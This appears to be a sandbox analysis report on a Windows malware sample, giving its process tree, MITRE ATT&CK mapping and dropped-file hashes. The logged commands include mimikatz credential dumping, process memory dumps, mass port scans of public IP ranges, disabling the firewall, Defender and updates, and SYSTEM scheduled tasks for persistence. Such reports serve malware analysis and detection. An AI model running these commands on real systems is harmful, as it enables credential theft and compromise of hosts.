    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:2256
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2112
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:1504
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:1652
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1472
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1140
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4804
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\mvibprbre\meetrtrln\vinqltqet.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mvibprbre\meetrtrln\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1456
- - C:\Windows\mvibprbre\meetrtrln\vinqltqet.exe
    C:\Windows\mvibprbre\meetrtrln\vinqltqet.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mvibprbre\meetrtrln\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\mvibprbre\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mvibprbre\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:3276
- - C:\Windows\mvibprbre\Corporate\vfshost.exe
    C:\Windows\mvibprbre\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qfbzrbveb" /ru system /tr "cmd /c C:\Windows\ime\pyismeq.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "qfbzrbveb" /ru system /tr "cmd /c C:\Windows\ime\pyismeq.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nfntmbqea" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nfbznfkt\pyismeq.exe /p everyone:F"
  2⤵
  PID:4648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2548
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "nfntmbqea" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nfbznfkt\pyismeq.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uvebumteg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\sksiiubel\fsfese.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2192
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "uvebumteg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\sksiiubel\fsfese.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1596
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4456
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4080
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:372
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2416
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1292
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4340
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5112
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3516
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1736
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1240
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4492
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4464
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4808
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:4404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4056
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:4092
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4792
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4044
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:8
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4780
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:1756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:1976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1552
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4968
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:3488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:3992
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:4592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:4384
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2864
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:2184
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1596
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3088
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 792 C:\Windows\TEMP\mvibprbre\792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 392 C:\Windows\TEMP\mvibprbre\392.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1400
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 1692 C:\Windows\TEMP\mvibprbre\1692.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2324
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 2584 C:\Windows\TEMP\mvibprbre\2584.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2916
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 2732 C:\Windows\TEMP\mvibprbre\2732.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3432
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 2776 C:\Windows\TEMP\mvibprbre\2776.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4764
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 3116 C:\Windows\TEMP\mvibprbre\3116.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 3844 C:\Windows\TEMP\mvibprbre\3844.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4596
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 3944 C:\Windows\TEMP\mvibprbre\3944.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 4008 C:\Windows\TEMP\mvibprbre\4008.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 964 C:\Windows\TEMP\mvibprbre\964.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 1936 C:\Windows\TEMP\mvibprbre\1936.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4384
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 4264 C:\Windows\TEMP\mvibprbre\4264.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2788
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 1996 C:\Windows\TEMP\mvibprbre\1996.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 2528 C:\Windows\TEMP\mvibprbre\2528.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1672
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 3028 C:\Windows\TEMP\mvibprbre\3028.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4720
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 1028 C:\Windows\TEMP\mvibprbre\1028.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2712
- C:\Windows\TEMP\mvibprbre\eyifeiqae.exe
  C:\Windows\TEMP\mvibprbre\eyifeiqae.exe -accepteula -mp 3136 C:\Windows\TEMP\mvibprbre\3136.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\mvibprbre\meetrtrln\scan.bat
  2⤵
  PID:3764
- - C:\Windows\mvibprbre\meetrtrln\bbsetityz.exe
    bbsetityz.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4432
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1552
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6076

C:\Windows\SysWOW64\pujbqc.exe
C:\Windows\SysWOW64\pujbqc.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1476

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\pyismeq.exe
1⤵
PID:1440
- C:\Windows\ime\pyismeq.exe
  C:\Windows\ime\pyismeq.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4708

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\sksiiubel\fsfese.exe /p everyone:F
1⤵
PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4432
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\sksiiubel\fsfese.exe /p everyone:F
  2⤵
  PID:1156

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nfbznfkt\pyismeq.exe /p everyone:F
1⤵
PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5048
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\nfbznfkt\pyismeq.exe /p everyone:F
  2⤵
  PID:1064

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\pyismeq.exe
1⤵
PID:2096
- C:\Windows\ime\pyismeq.exe
  C:\Windows\ime\pyismeq.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:220

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nfbznfkt\pyismeq.exe /p everyone:F
1⤵
PID:6020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5544
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\nfbznfkt\pyismeq.exe /p everyone:F
  2⤵
  PID:5624

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\sksiiubel\fsfese.exe /p everyone:F
1⤵
PID:3252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:6004
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\sksiiubel\fsfese.exe /p everyone:F
  2⤵
  PID:4404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\mvibprbre\1692.dmp

Filesize
4.1MB

MD5
5b3c3a4d7d33c30899b9ed7aad87955b

SHA1
ce359fa5a8bf0136f9f83332914bdd63d7634df9

SHA256
08faee7367bd06b4819efc7e0c011fa0edb143856b091bfa9c95de3aaa792492

SHA512
b17349920c797d340a46295860e34f032a49a3422f12b3844baa6cc02f108647552838636ada6680bf3b4a902796dcc992bbfa7e3b0c18cce9f9b30cab868a30

Download Submit
C:\Windows\TEMP\mvibprbre\1936.dmp

Filesize
25.8MB

MD5
cbe9353a5f1e1c920bdac539e4015553

SHA1
c125ce2b4bd64190842c749a3934f1f80ecccf3d

SHA256
beb729b8103019caaaa19e8f5d2ad05a0b93901ed7c69115e319549a0fbf864d

SHA512
805c3ab96a9bdcb01ec4ea46cbc37c806bb16649c6cafe5d2914669dd470098a0759242038643814c6910ab5da816ba4c887583f1cf30bca53a3bc96b4ee6822

Download Submit
C:\Windows\TEMP\mvibprbre\1996.dmp

Filesize
8.5MB

MD5
8c094e4c222a9b820967fa89eee156c9

SHA1
f837f82ed099c5a88af7b96a58537fe722a1fb95

SHA256
7badd0a06dbf4c072c90ddb107b69f62c7ae376ba729044705dd54a694af8174

SHA512
8037f16e4850c8b07d4ca0e6f9e0297ee7dc9bae0fb2f6f3f9d85de423bcb12ef702f98689eff69e6845cb22458c399469f3284aa96bf7f9bad3ee898e2f055d

Download Submit
C:\Windows\TEMP\mvibprbre\2584.dmp

Filesize
3.6MB

MD5
7d301da5c9610b394f6495f414494946

SHA1
ed26f466ce7aa5105fb57c5b902746cbb4c60ccf

SHA256
93e28213ed6b629f28121f1e20ff625015f9e681575d403747770cdff9ff08de

SHA512
9b73a86359abda75864493988d18253c1babab0fce800c27852aabc81bcfabf8476e16c0bda57585246fdae3578eb4b66d31afeee289ef8ae59ece4c076bddf4

Download Submit
C:\Windows\TEMP\mvibprbre\2732.dmp

Filesize
2.9MB

MD5
fea1279d94e0c2d4fe72b1ea3066f88a

SHA1
aceb24d5b9fbd4e7e914e5bf0b304bc6ce9ecbcd

SHA256
5c8926166d72538515e16bcc1243897d660ffc81e7e733a84d9c124c71610e7c

SHA512
27f2e368b7a53092679de4f82e0fec0f153f8fb8a6c71704a0ae83c19961d7f20783d74594038084f0067ac5cd38b6f855bf4e5cba40d7961fbd29094b505d10

Download Submit
C:\Windows\TEMP\mvibprbre\2776.dmp

Filesize
7.5MB

MD5
de857172214bd0ba8582976e9eda5847

SHA1
5db17edde2d83bfd5caa2002ccd2502afd96a31c

SHA256
bf25a343231dda7fb8dcf6c03fdeac4691ad4e0263747ac0b2dd4854cee42cee

SHA512
533b7773a73879cb844db13d4d972fcee01559e17059a3ae49dd07f37b5cb9128dd8f8435392bc808d1fa13b3b7749e39ae4ec203dd7899151275c850b9a9884

Download Submit
C:\Windows\TEMP\mvibprbre\3116.dmp

Filesize
822KB

MD5
51b9c92d2378c723c6ddd8b8b77896ce

SHA1
f6daa096e751f500f7eee814a5636c8403c2cce3

SHA256
869e49e39eb42ea4cfc33736b63ee1ab818ae30b9910b7a3b3182276595f4131

SHA512
866ea5eb2863648a28fa8a19865982abb0a74fec4e31b858fc3315c42912da94df76f96955730a39efd38783e255e249af0db1769feaf8f4a510e2321c65914d

Download Submit
C:\Windows\TEMP\mvibprbre\3844.dmp

Filesize
2.6MB

MD5
fe51d3a1cbead3382567975e7e8567c0

SHA1
a2d4c8451ed48ea41e8b1a661d4a904d92bff7b1

SHA256
1af2517735e2c8f0819e5dee8b5dc86bb558775c5e7c44eec13d275faba1895c

SHA512
8f99df4de3a834df791fb1c066006f02a95f4769c077ea3c3ed17ab5b9f02f72159087a56c6ba396f9630b1dc805cfff6b38037a9a4ebac595e69fa50ac4012b

Download Submit
C:\Windows\TEMP\mvibprbre\392.dmp

Filesize
33.2MB

MD5
246bbf0477aadd376872817e2bb19bdd

SHA1
2617c8283a920811325d77b0b22c3ca0397f3e7b

SHA256
77cbd0412e047319dad30b71539de75530f96b309321fcc99e5836120859a95d

SHA512
ded59814f9f4d1130b6576dd99b05b7fcb466c7a42cbdfbbf276b837c933bead92e0e4a7d4d5e17ca2d05717b3a61cf846f385084cddc2c3ded26381a2862c41

Download Submit
C:\Windows\TEMP\mvibprbre\3944.dmp

Filesize
20.4MB

MD5
6d1202bb1772ea6e573df3e0912e8461

SHA1
c154518398c88db588822d574d06a567cbabac43

SHA256
a3fa31d4518c8c69a6ac04947fc3dbdc71b731df0515133a3cda054bcd5ce615

SHA512
0eb7ebecdb8edc03688a40785a8589a65aee4b5e1beca32929cebd3b9934faa1f0ef9b0c43fe1a45b7236c3e4bcc24c3328c7104aa7b1abc2c9a2852498a585e

Download Submit
C:\Windows\TEMP\mvibprbre\4008.dmp

Filesize
4.2MB

MD5
f8a0d1d84f290ea9a8c90fb530abd1f1

SHA1
ae1c99e0cee660e5c5981eff0d8458ce67da8a45

SHA256
e3db950dcaefa888fff7f8162c8996b6884affd0fdac74af785b036567a83069

SHA512
d4c2356054fac76f730d0ca6f9c0e315fad02c56e76156a2bf79dc45360e10119b958890d04742220d1e6c39e5d75af8ff1fa4b3b71540ff4def4ecd5e0cee03

Download Submit
C:\Windows\TEMP\mvibprbre\4264.dmp

Filesize
1.2MB

MD5
1896ad884a7e7046a16f2b9148861d7f

SHA1
d13226a433ce8069533d99e682fe7e365cf8edc5

SHA256
188f619685c1310c28084d4da8e4e696de9a4c0751dc38a75395e3cfcd878f47

SHA512
255917f0e5def3fb581803f6ecf6519972323d01e472ed8c4d490e162b5040b7d80860f575a65ed6a9bc473822fb7a13efb3d6650e7ce179375b4a934a9e1b04

Download Submit
C:\Windows\TEMP\mvibprbre\792.dmp

Filesize
3.3MB

MD5
fa0a332dd8d5e4cbeffe5e5b26f1b8ac

SHA1
2a8476a83de59f82479d533602accf21d0afa56a

SHA256
0a8e78d9e70d037e648eef4831c92c31a6785035f5a379a01e38e47a2cad448b

SHA512
2c7cc901b076042ee056550538d3775fbb32221353e3ebb239d4c9da59f44fa89ee6f6415f8463e316363aee7dde13b007882522076b1ed0e5b5995b6a7dc3d3

Download Submit
C:\Windows\TEMP\mvibprbre\964.dmp

Filesize
43.9MB

MD5
5afd305a7abd364c5dda0272c844b07e

SHA1
c988dc9f8232760f54e8d41a16ce02c8dbb42ec2

SHA256
ace12e9bcb1a4636a524783c8a12a945e59a8e18487d6042107fb675a0699941

SHA512
86306a95636597c41f55cbc9d072dcb2db47c285c6ce20100a3ef8f582d05abccb8dfa767d081870cbebb66b82c99f5c756003c121d697169a10f099315dfc3d

Download Submit
C:\Windows\TEMP\sksiiubel\config.json

Filesize
693B

MD5
